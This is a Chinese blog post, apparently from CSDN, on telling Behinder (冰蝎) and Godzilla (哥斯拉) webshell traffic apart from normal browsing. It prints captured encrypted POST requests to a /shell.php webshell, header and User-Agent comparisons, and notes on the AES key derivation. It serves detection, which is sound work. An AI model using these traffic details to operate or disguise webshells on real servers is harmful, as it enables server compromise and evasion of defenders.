Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

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POST /shell.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Content-type: application/x-www-form-urlencoded
Referer: http://192.168.4.229/shell.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36
Cache-Control: no-cache
Pragma: no-cache
Host: 192.168.4.229
Connection: keep-alive
Content-Length: 4716
Cookie: PHPSESSID=kv8hmj5ack6dv9uiobhoaff176;PHPSESSID=kv8hmj5ack6dv9uiobhoaff176

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

1  user-agent

 火狐浏览器与冰蝎流量的user-agent对比

火狐浏览器的user-agent

 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0

冰蝎流量的user-agent

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36

正常流量与冰蝎流量的对比

正常流量

GET /shell.php HTTP/1.1
Host: 192.168.4.229
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: PHPSESSID=kof14ks054u9oo46uacv6vjgvk
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

 冰蝎流量

POST /shell.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Content-type: application/x-www-form-urlencoded
Referer: http://192.168.4.229/shell.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36
Cache-Control: no-cache
Pragma: no-cache
Host: 192.168.4.229
Connection: keep-alive
Content-Length: 6252

流量特征加密

冰蝎  加密方式为  利用动态二进制加密(AES加密) 

另一个特征  全程无明文交互,密钥格式为md5("admin")[0:16];”

密钥加密方式为md5

哥斯拉流量

流量特征  密码  eval  pass

.SYS.
关注
  • 4
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Apache 2.4.39 Win64
04-25
Windows 环境 Apache 最新下载 Apache 2.4.39 Win64 httpd-2.4.39-win64-VC15
强大的webshell管理工具-哥斯拉
12-27
标题中的“强大的webshell管理工具-哥斯拉”指的是一个名为“哥斯拉”的软件工具,它是专门设计用于管理和控制Webshell的。Webshell一种Web服务器上运行的后门程序,通常由黑客植入,以远程控制服务器或执行恶意...
常用的WebShell管理工具
美奇软件开发工作室
10-13 2896
1、中国菜刀(Chopper) 中国菜刀是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。只要支持动态脚本的网站,都可以用中国菜刀来进行管理!在非简体中文环境下使用,自动切换到英文界面。UNICODE方式编译,支持多国语言输入显示。 官网:http://www.maicaidao.co/ 2、蚁剑(AntSword) AntSword是一个开放源代码,跨平台的网站管理工具,旨在满足渗透测试人员以及具有权限和/或授权的安全研究人员以及网站管理员的需求。 github项目地址:https://
常见webshell工具及特征分析
最新发布
白帽黑客八哥的博客
05-29 1489
在工作中经常会遇到各种websehll,黑客通常要通过各种方式获取 webshell,从而获得企业网站的控制权,识别出webshell文件或通信流量可以有效地阻止黑客进一步的攻击行为,下面以常见的四款webshell进行分析,对工具连接流量有个基本认识。Webshell简介webshell就是以aspphp、jsp或者cgi等网页文件形式存在的一种代码执行环境,主要用于网站管理、服务器管理、权限管理等操作。
什么是webshell 常见的webshell工具有哪些
Karka_的博客
06-08 1015
Webshell是黑客经常使用的一种恶意脚本,其目的是获得服务器的执行操作权限,比如执行系统命令、窃取用户数据、删除web页面、修改主页等,其危害不言而喻。黑客通常利用常见的漏洞,如SQL注入、远程文件包含(RFI)、FTP,甚至使用跨站点脚本攻击(XSS)等方式作为社会工程攻击的一部分,最终达到控制网站服务器的目的。常见的webshell编写语言为asp、jsp和php。本文将以php Webshell为示例,详细解释Webshell的常用函数、工作方式以及常用隐藏技术。
渗透利器 | 常见的 WebShell 管理工具
喜欢Python编程的程序员柚柚呀
11-28 1786
攻击者在入侵网站时,通常要通过各种方式写入 Webshell,从而获得服务器的控制权限,比如执行系统命令、读取配置文件、窃取用户数据,篡改网站页面等操作。本文介绍十款常用的 Webshell 管理工具,以供你选择,你会选择哪一个?中国菜刀是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。只要支持动态脚本的网站,都可以用中国菜刀来进行管理!在非简体中文环境下使用,自动切换到英文界面。UNICODE 方式编译,支持多国语言输入显示。
webshell是什么?网络安全攻防之webshell攻击!
Galaxy_0的博客
12-29 2087
Webshell是黑客经常使用的一种恶意脚本,其目的是获得服务器的执行操作权限,常见的webshell编写语言为asp、jsp和php。比如执行系统命令、窃取用户数据、删除web页面、修改主页等,其危害不言而喻。黑客通常利用常见的漏洞,如SQL注入、远程文件包含(RFI)、FTP,甚至使用跨站点脚本攻击(XSS)等方式作为社会工程攻击的一部分,最终达到控制网站服务器的目的。
webshell管理工具
01-11
Webshell管理工具一种Web服务器上运行的程序,主要用于远程管理和控制网站服务器。它的一句话管理工具特性,意味着用户可以通过简洁的命令行输入,执行多种复杂的服务器操作,从而提高工作效率,减少管理负担。...
kingkong:解密哥斯拉webshell管理工具流量
04-16
解密哥斯拉Godzilla-V2.96 webshell管理工具流量 目前只支持jsp类型的webshell流量解密 Usage 获取攻击者上传到服务器的webshell样本 获取wireshark之类的流量包,一般甲方有科来之类的全流量镜像设备,联系运维人员...
天蝎1_天蝎webshell_webshell管理_
10-01
webshell管理工具天蝎,是由冰蝎变种,可以绕过各种检测设备。
冰蝎-Webshell管理工具
weixin_66717977的博客
06-30 6964
冰蝎超详解,新手食用
网络安全-webshell详解(原理、攻击、检测与防御)
热门推荐
关注网络安全、云原生安全
09-14 6万+
简介 原理 攻击 WebShell管理工具 Cknife中国菜刀 antSword中国蚁剑 冰蝎动态二进制加密网站管理客户端 weevely3Weaponized web shell Altmanthe cross platform webshell tool in .NET Webshell SniperManage your website via terminal quasibotcomplex webshell manager, quasi-http botne...
信息安全笔记:上传漏洞
Lora青蛙的博客
06-29 472
Webshell——脚本攻击工具 webshell就是一个木马后门 shell是指“为使用者提供操作界面”的软件,类似于windows 的cmd.exe。攻击者常常将服务器能运行的脚本文件(木马文件)放置在网站服务器地web目录中,通过web方式,利用木马控制网站服务器,包括上传下载文件、执行任意程序命令等,这就称为拿到了服务器的webshell,也就是拿 到服务器的web控制权限。 webshell可以穿越防火墙 攻击者与被控制地服务器或远程主机都是通过80端口传递数据,因此不会被防火墙拦截。 中国菜刀和
webshell管理工具-菜刀的管理操作
黄乔国PHP
03-09 1792
Webshell工具一种用于测试和评估Web服务器安全性的软件工具。这些工具可以利用Web应用程序中的漏洞或者弱密码等安全问题,将Webshell植入到目标服务器上,从而获取对服务器的控制权。支持多种Web应用程序漏洞利用:例如SQL注入、文件包含、文件上传、命令注入等。支持多种Webshell类型:例如PHP、ASP、JSP等。提供一系列操作功能:例如上传文件、下载文件、执行命令、创建用户、修改系统配置等。
webshell工具
heyingcheng的博客
05-10 2389
1,eval()函数把字符串按照php代码来计算;2,该字符串必须是合法的php代码,且必须以分号结尾;php中的echo的功能是把参数直接输出到页面上:php?给参数caidao赋值,然后输出到页面上:给caidao的值111输出到页面是111eval函数把字符串按照php代码进行解析,并且该字符串必须是合法的php代码。eval函数前面加上@符号可以不显示报错。php?eval函数的作用也是解析参数,我们在firefox随意传递一个参数试试:可以看到没有加@时我们会看到报错信息。
WebShell攻击流程大揭秘: 渗透测试必备技能(网页后门)
weixin_43263566的博客
01-25 1万+
Webshell(网页后门)
Web安全-Godzilla(哥斯拉)Webshell管理工具使用
Boom!脑洞大爆炸的博客
07-03 4659
Web安全-Godzilla(哥斯拉)Webshell管理工具使用

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值